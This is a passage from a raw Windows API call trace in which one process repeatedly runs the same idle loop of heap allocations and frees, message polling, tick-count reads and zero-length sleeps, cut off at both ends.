hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.329] GetTickCount () returned 0x1d1bf [0066.330] Sleep (dwMilliseconds=0x0) [0066.330] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.330] GetLastError () returned 0x0 [0066.330] GetCurrentProcessId () returned 0xa44 [0066.330] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.330] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.330] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.330] GetTickCount () returned 0x1d1bf [0066.330] GetTickCount () returned 0x1d1bf [0066.330] GetTickCount () returned 0x1d1bf [0066.330] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.330] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.330] GetTickCount () returned 0x1d1bf [0066.330] Sleep (dwMilliseconds=0x0) [0066.330] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.330] GetLastError () returned 0x0 [0066.331] GetCurrentProcessId () returned 0xa44 [0066.331] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.331] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.331] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.331] GetTickCount () returned 0x1d1bf [0066.331] GetTickCount () returned 0x1d1bf [0066.331] GetTickCount () returned 0x1d1bf [0066.331] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.331] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.331] GetTickCount () returned 0x1d1bf [0066.331] Sleep (dwMilliseconds=0x0) [0066.331] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.331] GetLastError () returned 0x0 [0066.332] GetCurrentProcessId () returned 0xa44 [0066.332] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.332] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.332] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.332] GetTickCount () returned 0x1d1cf [0066.332] GetTickCount () returned 0x1d1cf [0066.332] GetTickCount () returned 0x1d1cf [0066.332] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.332] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.332] GetTickCount () returned 0x1d1cf [0066.332] Sleep (dwMilliseconds=0x0) [0066.332] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.332] GetLastError () returned 0x0 [0066.332] GetCurrentProcessId () returned 0xa44 [0066.332] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.332] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.332] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.332] GetTickCount () returned 0x1d1cf [0066.332] GetTickCount () returned 0x1d1cf [0066.333] GetTickCount () returned 0x1d1cf [0066.333] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.333] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.333] GetTickCount () returned 0x1d1cf [0066.333] Sleep (dwMilliseconds=0x0) [0066.333] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.333] GetLastError () returned 0x0 [0066.333] GetCurrentProcessId () returned 0xa44 [0066.333] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.333] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.333] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.333] GetTickCount () returned 0x1d1cf [0066.333] GetTickCount () returned 0x1d1cf [0066.333] GetTickCount () returned 0x1d1cf [0066.333] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.333] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.333] GetTickCount () returned 0x1d1cf [0066.334] Sleep (dwMilliseconds=0x0) [0066.334] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.334] GetLastError () returned 0x0 [0066.334] GetCurrentProcessId () returned 0xa44 [0066.334] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.334] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.334] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.334] GetTickCount () returned 0x1d1cf [0066.334] GetTickCount () returned 0x1d1cf [0066.334] GetTickCount () returned 0x1d1cf [0066.334] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.334] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.334] GetTickCount () returned 0x1d1cf [0066.334] Sleep (dwMilliseconds=0x0) [0066.334] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.334] GetLastError () returned 0x0 [0066.335] GetCurrentProcessId () returned 0xa44 [0066.335] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.335] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.335] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.335] GetTickCount () returned 0x1d1cf [0066.335] GetTickCount () returned 0x1d1cf [0066.335] GetTickCount () returned 0x1d1cf [0066.335] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.335] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.335] GetTickCount () returned 0x1d1cf [0066.335] Sleep (dwMilliseconds=0x0) [0066.335] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.335] GetLastError () returned 0x0 [0066.335] GetCurrentProcessId () returned 0xa44 [0066.335] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.335] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.335] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.335] GetTickCount () returned 0x1d1cf [0066.335] GetTickCount () returned 0x1d1cf [0066.336] GetTickCount () returned 0x1d1cf [0066.336] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.336] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.336] GetTickCount () returned 0x1d1cf [0066.336] Sleep (dwMilliseconds=0x0) [0066.336] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.336] GetLastError () returned 0x0 [0066.336] GetCurrentProcessId () returned 0xa44 [0066.336] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.336] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.336] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.336] GetTickCount () returned 0x1d1cf [0066.336] GetTickCount () returned 0x1d1cf [0066.336] GetTickCount () returned 0x1d1cf [0066.336] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.336] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.336] GetTickCount () returned 0x1d1cf [0066.337] Sleep (dwMilliseconds=0x0) [0066.337] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.337] GetLastError () returned 0x0 [0066.337] GetCurrentProcessId () returned 0xa44 [0066.337] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.337] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.337] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.337] GetTickCount () returned 0x1d1cf [0066.337] GetTickCount () returned 0x1d1cf [0066.337] GetTickCount () returned 0x1d1cf [0066.337] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.337] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.337] GetTickCount () returned 0x1d1cf [0066.337] Sleep (dwMilliseconds=0x0) [0066.337] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.337] GetLastError () returned 0x0 [0066.338] GetCurrentProcessId () returned 0xa44 [0066.338] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.338] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.338] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.338] GetTickCount () returned 0x1d1cf [0066.338] GetTickCount () returned 0x1d1cf [0066.338] GetTickCount () returned 0x1d1cf [0066.338] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.338] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.338] GetTickCount () returned 0x1d1cf [0066.338] Sleep (dwMilliseconds=0x0) [0066.338] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.338] GetLastError () returned 0x0 [0066.338] GetCurrentProcessId () returned 0xa44 [0066.338] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.338] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.338] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.338] GetTickCount () returned 0x1d1cf [0066.338] GetTickCount () returned 0x1d1cf [0066.338] GetTickCount () returned 0x1d1cf [0066.339] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.339] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.339] GetTickCount () returned 0x1d1cf [0066.339] Sleep (dwMilliseconds=0x0) [0066.339] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.339] GetLastError () returned 0x0 [0066.339] GetCurrentProcessId () returned 0xa44 [0066.339] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.339] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.339] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.339] GetTickCount () returned 0x1d1cf [0066.339] GetTickCount () returned 0x1d1cf [0066.339] GetTickCount () returned 0x1d1cf [0066.339] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.339] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.339] GetTickCount () returned 0x1d1cf [0066.339] Sleep (dwMilliseconds=0x0) [0066.340] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.340] GetLastError () returned 0x0 [0066.340] GetCurrentProcessId () returned 0xa44 [0066.340] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.340] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.340] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.340] GetTickCount () returned 0x1d1cf [0066.340] GetTickCount () returned 0x1d1cf [0066.340] GetTickCount () returned 0x1d1cf [0066.340] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.340] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.340] GetTickCount () returned 0x1d1cf [0066.340] Sleep (dwMilliseconds=0x0) [0066.340] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.340] GetLastError () returned 0x0 [0066.340] GetCurrentProcessId () returned 0xa44 [0066.340] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.341] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.341] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.341] GetTickCount () returned 0x1d1cf [0066.341] GetTickCount () returned 0x1d1cf [0066.341] GetTickCount () returned 0x1d1cf [0066.341] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.341] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.341] GetTickCount () returned 0x1d1cf [0066.341] Sleep (dwMilliseconds=0x0) [0066.341] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.341] GetLastError () returned 0x0 [0066.341] GetCurrentProcessId () returned 0xa44 [0066.341] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.341] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.341] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.341] GetTickCount () returned 0x1d1cf [0066.341] GetTickCount () returned 0x1d1cf [0066.341] GetTickCount () returned 0x1d1cf [0066.341] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.341] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.342] GetTickCount () returned 0x1d1cf [0066.342] Sleep (dwMilliseconds=0x0) [0066.342] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.342] GetLastError () returned 0x0 [0066.342] GetCurrentProcessId () returned 0xa44 [0066.342] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.342] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.342] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.342] GetTickCount () returned 0x1d1cf [0066.342] GetTickCount () returned 0x1d1cf [0066.342] GetTickCount () returned 0x1d1cf [0066.342] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.342] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.342] GetTickCount () returned 0x1d1cf [0066.342] Sleep (dwMilliseconds=0x0) [0066.342] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.343] GetLastError () returned 0x0 [0066.343] GetCurrentProcessId () returned 0xa44 [0066.343] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.343] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.343] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.343] GetTickCount () returned 0x1d1cf [0066.343] GetTickCount () returned 0x1d1cf [0066.343] GetTickCount () returned 0x1d1cf [0066.343] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.343] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.343] GetTickCount () returned 0x1d1cf [0066.343] Sleep (dwMilliseconds=0x0) [0066.343] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.343] GetLastError () returned 0x0 [0066.343] GetCurrentProcessId () returned 0xa44 [0066.343] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.343] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.344] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.344] GetTickCount () returned 0x1d1cf [0066.344] GetTickCount () returned 0x1d1cf [0066.344] GetTickCount () returned 0x1d1cf [0066.344] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.344] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.344] GetTickCount () returned 0x1d1de [0066.344] Sleep (dwMilliseconds=0x0) [0066.344] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.344] GetLastError () returned 0x0 [0066.344] GetCurrentProcessId () returned 0xa44 [0066.344] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.344] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.344] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.345] GetTickCount () returned 0x1d1de [0066.345] GetTickCount () returned 0x1d1de [0066.345] GetTickCount () returned 0x1d1de [0066.345] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.345] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.345] GetTickCount () returned 0x1d1de [0066.345] Sleep (dwMilliseconds=0x0) [0066.345] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.345] GetLastError () returned 0x0 [0066.345] GetCurrentProcessId () returned 0xa44 [0066.345] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.345] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.345] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.345] GetTickCount () returned 0x1d1de [0066.345] GetTickCount () returned 0x1d1de [0066.345] GetTickCount () returned 0x1d1de [0066.345] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.345] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.345] GetTickCount () returned 0x1d1de [0066.346] Sleep (dwMilliseconds=0x0) [0066.346] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.346] GetLastError () returned 0x0 [0066.346] GetCurrentProcessId () returned 0xa44 [0066.346] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.346] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.346] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.346] GetTickCount () returned 0x1d1de [0066.346] GetTickCount () returned 0x1d1de [0066.346] GetTickCount () returned 0x1d1de [0066.346] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.346] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.346] GetTickCount () returned 0x1d1de [0066.346] Sleep (dwMilliseconds=0x0) [0066.346] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.346] GetLastError () returned 0x0 [0066.347] GetCurrentProcessId () returned 0xa44 [0066.347] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.347] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.347] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.347] GetTickCount () returned 0x1d1de [0066.347] GetTickCount () returned 0x1d1de [0066.347] GetTickCount () returned 0x1d1de [0066.347] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.347] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.347] GetTickCount () returned 0x1d1de [0066.347] Sleep (dwMilliseconds=0x0) [0066.347] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.347] GetLastError () returned 0x0 [0066.347] GetCurrentProcessId () returned 0xa44 [0066.347] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.347] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.347] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.347] GetTickCount () returned 0x1d1de [0066.347] GetTickCount () returned 0x1d1de [0066.348] GetTickCount () returned 0x1d1de [0066.348] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.348] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.348] GetTickCount () returned 0x1d1de [0066.348] Sleep (dwMilliseconds=0x0) [0066.348] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.348] GetLastError () returned 0x0 [0066.348] GetCurrentProcessId () returned 0xa44 [0066.348] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.348] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.348] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.348] GetTickCount () returned 0x1d1de [0066.348] GetTickCount () returned 0x1d1de [0066.348] GetTickCount () returned 0x1d1de [0066.348] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.348] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.348] GetTickCount () returned 0x1d1de [0066.349] Sleep (dwMilliseconds=0x0) [0066.349] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.349] GetLastError () returned 0x0 [0066.349] GetCurrentProcessId () returned 0xa44 [0066.349] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.349] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.349] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.349] GetTickCount () returned 0x1d1de [0066.349] GetTickCount () returned 0x1d1de [0066.349] GetTickCount () returned 0x1d1de [0066.349] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.349] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.349] GetTickCount () returned 0x1d1de [0066.349] Sleep (dwMilliseconds=0x0) [0066.349] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.349] GetLastError () returned 0x0 [0066.350] GetCurrentProcessId () returned 0xa44 [0066.350] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.350] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.350] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.350] GetTickCount () returned 0x1d1de [0066.350] GetTickCount () returned 0x1d1de [0066.350] GetTickCount () returned 0x1d1de [0066.350] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.350] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.350] GetTickCount () returned 0x1d1de [0066.350] Sleep (dwMilliseconds=0x0) [0066.350] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.350] GetLastError () returned 0x0 [0066.350] GetCurrentProcessId () returned 0xa44 [0066.350] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.350] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.350] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.350] GetTickCount () returned 0x1d1de [0066.350] GetTickCount () returned 0x1d1de [0066.351] GetTickCount () returned 0x1d1de [0066.351] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: 